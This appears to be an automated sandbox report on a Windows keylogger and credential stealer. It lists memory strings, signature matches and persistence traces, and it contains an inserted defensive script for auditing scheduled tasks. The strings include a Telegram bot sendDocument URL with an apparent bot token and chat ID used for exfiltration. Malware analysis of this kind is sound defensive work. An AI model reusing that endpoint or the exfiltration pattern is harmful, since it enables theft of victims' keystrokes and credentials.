Source: UOEAjWmusE.exe, 00000007.00000002.3767694744.0000000002E16000.00000004.00000800.00020000.00000000.sdmp, gJdonuKfIrqN.exe, 0000000C.00000002.3768174332.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://api.telegram.org
Source: UOEAjWmusE.exe, 00000007.00000002.3767694744.0000000002E16000.00000004.00000800.00020000.00000000.sdmp, gJdonuKfIrqN.exe, 0000000C.00000002.3768174332.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://api.telegram.org/bot
Source: UOEAjWmusE.exe, 00000000.00000002.1332453458.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, UOEAjWmusE.exe, 00000000.00000002.1332453458.0000000004663000.00000004.00000800.00020000.00000000.sdmp, UOEAjWmusE.exe, 00000007.00000002.3765410007.0000000000403000.00000040.00000400.00020000.00000000.sdmp, gJdonuKfIrqN.exe, 00000009.00000002.1376866366.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: gJdonuKfIrqN.exe, 0000000C.00000002.3768174332.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://api.telegram.org/bot7589629165:AAFGWVS6kZwkIgQczX-gx5tFmWDO1tfayU0/sendDocument?chat_id=7791
Source: UOEAjWmusE.exe, 00000007.00000002.3767694744.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, gJdonuKfIrqN.exe, 0000000C.00000002.3768174332.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://reallyfreegeoip.org
Source: UOEAjWmusE.exe, 00000000.00000002.1332453458.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, UOEAjWmusE.exe, 00000000.00000002.1332453458.0000000004663000.00000004.00000800.00020000.00000000.sdmp, UOEAjWmusE.exe, 00000007.00000002.3765410007.0000000000403000.00000040.00000400.00020000.00000000.sdmp, UOEAjWmusE.exe, 00000007.00000002.3767694744.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, gJdonuKfIrqN.exe, 00000009.00000002.1376866366.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, gJdonuKfIrqN.exe, 0000000C.00000002.3768174332.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: UOEAjWmusE.exe, 00000007.00000002.3767694744.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, gJdonuKfIrqN.exe, 0000000C.00000002.3768174332.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49692
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49693 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.12:49693 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.12:49694 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  Source: 0.2.UOEAjWmusE.exe.3e24210.3.raw.unpack, UltraSpeed.cs .Net Code: VKCodeToUnicode
                  Source: 0.2.UOEAjWmusE.exe.3e3b030.1.raw.unpack, UltraSpeed.cs .Net Code: VKCodeToUnicode
                  Source: 9.2.gJdonuKfIrqN.exe.3c99a98.2.raw.unpack, UltraSpeed.cs .Net Code: VKCodeToUnicode
                  Source: 9.2.gJdonuKfIrqN.exe.3cb08b8.3.raw.unpack, UltraSpeed.cs .Net Code: VKCodeToUnicode

                  System Summary

                  Source: 7.2.UOEAjWmusE.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 7.2.UOEAjWmusE.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.UOEAjWmusE.exe.3e24210.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.UOEAjWmusE.exe.3e24210.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 9.2.gJdonuKfIrqN.exe.3c99a98.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 9.2.gJdonuKfIrqN.exe.3c99a98.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 9.2.gJdonuKfIrqN.exe.3cb08b8.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 9.2.gJdonuKfIrqN.exe.3cb08b8.3.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 9.2.gJdonuKfIrqN.exe.3cb08b8.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.UOEAjWmusE.exe.3e24210.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.UOEAjWmusE.exe.3e24210.3.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.UOEAjWmusE.exe.3e3b030.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.UOEAjWmusE.exe.3e3b030.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 9.2.gJdonuKfIrqN.exe.3cb08b8.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.UOEAjWmusE.exe.3e3b030.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.UOEAjWmusE.exe.3e3b030.1.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.UOEAjWmusE.exe.483c900.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 9.2.gJdonuKfIrqN.exe.3c99a98.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 0.2.UOEAjWmusE.exe.483c900.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 9.2.gJdonuKfIrqN.exe.3c99a98.2.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 00000007.00000002.3765410007.0000000000403000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000000.00000002.1332453458.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000009.00000002.1376866366.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000000.00000002.1332453458.0000000004663000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: UOEAjWmusE.exe PID: 6704, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: UOEAjWmusE.exe PID: 2992, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: gJdonuKfIrqN.exe PID: 3552, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: UOEAjWmusE.exe, 00000000.00000002.1332453458.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCloudServices.exe< vs UOEAjWmusE.exe
                  Source: UOEAjWmusE.exe, 00000000.00000002.1332453458.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCaptive.dll" vs UOEAjWmusE.exe
                  Source: UOEAjWmusE.exe, 00000000.00000002.1336294709.0000000009970000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs UOEAjWmusE.exe
                  Source: UOEAjWmusE.exe, 00000000.00000002.1332453458.0000000004663000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs UOEAjWmusE.exe
                  Source: UOEAjWmusE.exe, 00000000.00000002.1333888240.00000000055C0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameCaptive.dll" vs UOEAjWmusE.exe
                  Source: UOEAjWmusE.exe, 00000000.00000002.1329759693.000000000108E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs UOEAjWmusE.exe
                  Source: UOEAjWmusE.exe, 00000000.00000000.1299004426.0000000000952000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamegATZ.exe@ vs UOEAjWmusE.exe
                  Source: UOEAjWmusE.exe, 00000000.00000002.1331909369.0000000002F9B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCloudServices.exe< vs UOEAjWmusE.exe
                  Source: UOEAjWmusE.exe, 00000007.00000002.3765576766.0000000000CF7000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs UOEAjWmusE.exe
                  Source: UOEAjWmusE.exe Binary or memory string: OriginalFilenamegATZ.exe@ vs UOEAjWmusE.exe
                  Source: UOEAjWmusE.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 7.2.UOEAjWmusE.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 7.2.UOEAjWmusE.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.UOEAjWmusE.exe.3e24210.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.UOEAjWmusE.exe.3e24210.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 9.2.gJdonuKfIrqN.exe.3c99a98.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 9.2.gJdonuKfIrqN.exe.3c99a98.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 9.2.gJdonuKfIrqN.exe.3cb08b8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 9.2.gJdonuKfIrqN.exe.3cb08b8.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 9.2.gJdonuKfIrqN.exe.3cb08b8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.UOEAjWmusE.exe.3e24210.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.UOEAjWmusE.exe.3e24210.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.UOEAjWmusE.exe.3e3b030.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.UOEAjWmusE.exe.3e3b030.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 9.2.gJdonuKfIrqN.exe.3cb08b8.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.UOEAjWmusE.exe.3e3b030.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.UOEAjWmusE.exe.3e3b030.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.UOEAjWmusE.exe.483c900.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 9.2.gJdonuKfIrqN.exe.3c99a98.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.UOEAjWmusE.exe.483c900.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 9.2.gJdonuKfIrqN.exe.3c99a98.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000007.00000002.3765410007.0000000000403000.00000040.00000400.00020000.00000000.sdmp, 00000000.00000002.1332453458.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, 00000009.00000002.1376866366.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, 00000000.00000002.1332453458.0000000004663000.00000004.00000800.00020000.00000000.sdmp (type: MEMORY); Process Memory Space: UOEAjWmusE.exe PID 6704, UOEAjWmusE.exe PID 2992, gJdonuKfIrqN.exe PID 3552 (type: MEMORYSTR) | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 (os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23)
Source: UOEAjWmusE.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: gJdonuKfIrqN.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.UOEAjWmusE.exe.3e24210.3.raw.unpack, 0.2.UOEAjWmusE.exe.3e3b030.1.raw.unpack, 9.2.gJdonuKfIrqN.exe.3c99a98.2.raw.unpack, 9.2.gJdonuKfIrqN.exe.3cb08b8.3.raw.unpack (UltraSpeed.cs and COVIDPickers.cs in each) | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, 0.2.UOEAjWmusE.exe.483c900.0.raw.unpack, 0.2.UOEAjWmusE.exe.9970000.5.raw.unpack, CN5yYHyRFbwxLmQByk.cs | Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity); System.Security.Principal.WindowsIdentity.GetCurrent(); System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.UOEAjWmusE.exe.483c900.0.raw.unpack, 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, 0.2.UOEAjWmusE.exe.9970000.5.raw.unpack, DO0t4SpngkX2NaXBd4.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole); System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@20/10@3/3
Source: C:\Users\user\Desktop\UOEAjWmusE.exe | File created: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe
Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4664:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7088:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1360:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6392:120:WilError_03
Source: C:\Users\user\Desktop\UOEAjWmusE.exe | File created: C:\Users\user\AppData\Local\Temp\tmpF362.tmp
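The tmpF362.tmp written here is the task definition that schtasks.exe later imports with /Create /XML (see the process list further down). When such a file is recovered from a host, the question is whether the task it defines runs something from a user-writable location, hides itself, and fires at logon. The Python below is an added example, not part of this Joe Sandbox report or of the sample: it audits a Task Scheduler XML for exactly those properties. The XML it parses is constructed to be consistent with the task name (Updates\gJdonuKfIrqN) and the dropped-file path the report shows; the real content of tmpF362.tmp is not in the report, and the element set, the helper names and the directory list are assumptions.

```python
"""Audit a Task Scheduler XML definition for user-land persistence traits.
Added example, not from the Joe Sandbox report or the sample it describes.
"""
import re
import xml.etree.ElementTree as ET

# Task Scheduler XML namespace (schtasks /XML consumes this schema).
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Constructed task definition. It matches the task name and drop path the
# report shows, but the real tmpF362.tmp is not reproduced in the report.
# schtasks exports are UTF-16 with an XML declaration; the declaration is
# omitted here so the string parses directly.
SAMPLE_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Description>Updates</Description></RegistrationInfo>
  <Triggers>
    <LogonTrigger><Enabled>true</Enabled></LogonTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author"><RunLevel>LeastPrivilege</RunLevel></Principal>
  </Principals>
  <Settings>
    <Hidden>true</Hidden>
    <StartWhenAvailable>true</StartWhenAvailable>
  </Settings>
  <Actions Context="Author">
    <Exec><Command>C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe</Command></Exec>
  </Actions>
</Task>
"""

# Directories an unprivileged user can write to (assumed list). A task whose
# action lives in one of these is the classic user-land persistence pattern.
USER_WRITABLE = re.compile(
    r"\\(AppData\\(Roaming|Local)|Users\\Public|ProgramData|Windows\\Temp)\\", re.I
)


def audit_task(task_name: str, xml_text) -> list[str]:
    """Return finding tags for one task definition (str or bytes XML)."""
    root = ET.fromstring(xml_text)
    findings = []
    # Every Exec action whose command sits in a user-writable directory.
    for cmd in root.findall("./t:Actions/t:Exec/t:Command", NS):
        path = (cmd.text or "").strip().strip('"')
        if USER_WRITABLE.search(path):
            findings.append("exec_from_user_writable:" + path)
    # <Hidden>true</Hidden> keeps the task out of the default Task Scheduler view.
    hidden = root.find("./t:Settings/t:Hidden", NS)
    if hidden is not None and (hidden.text or "").strip().lower() == "true":
        findings.append("hidden_task")
    # Logon trigger: re-executes the payload every time the user signs in.
    if root.find("./t:Triggers/t:LogonTrigger", NS) is not None:
        findings.append("logon_trigger")
    # Vendor tasks live under \Microsoft\...; a non-Microsoft folder combined
    # with a user-writable action is the pairing worth escalating.
    if not task_name.lstrip("\\").lower().startswith("microsoft\\") and any(
        f.startswith("exec_from_user_writable") for f in findings
    ):
        findings.append("non_vendor_folder:" + task_name)
    return findings


def audit_task_file(task_name: str, path: str) -> list[str]:
    """Audit a task XML on disk; bytes are passed through so the UTF-16
    declaration schtasks writes is honoured by the parser."""
    with open(path, "rb") as fh:
        return audit_task(task_name, fh.read())


if __name__ == "__main__":
    for finding in audit_task(r"Updates\gJdonuKfIrqN", SAMPLE_TASK_XML):
        print(finding)
```

On a live host the same checks can be run over the task files under C:\Windows\System32\Tasks, which store the imported XML; the task name is the file's path relative to that directory. The hidden and logon-trigger findings are weak on their own (plenty of legitimate tasks have both), so the function only escalates the folder finding when a user-writable action is also present.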
Source: UOEAjWmusE.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\UOEAjWmusE.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\UOEAjWmusE.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
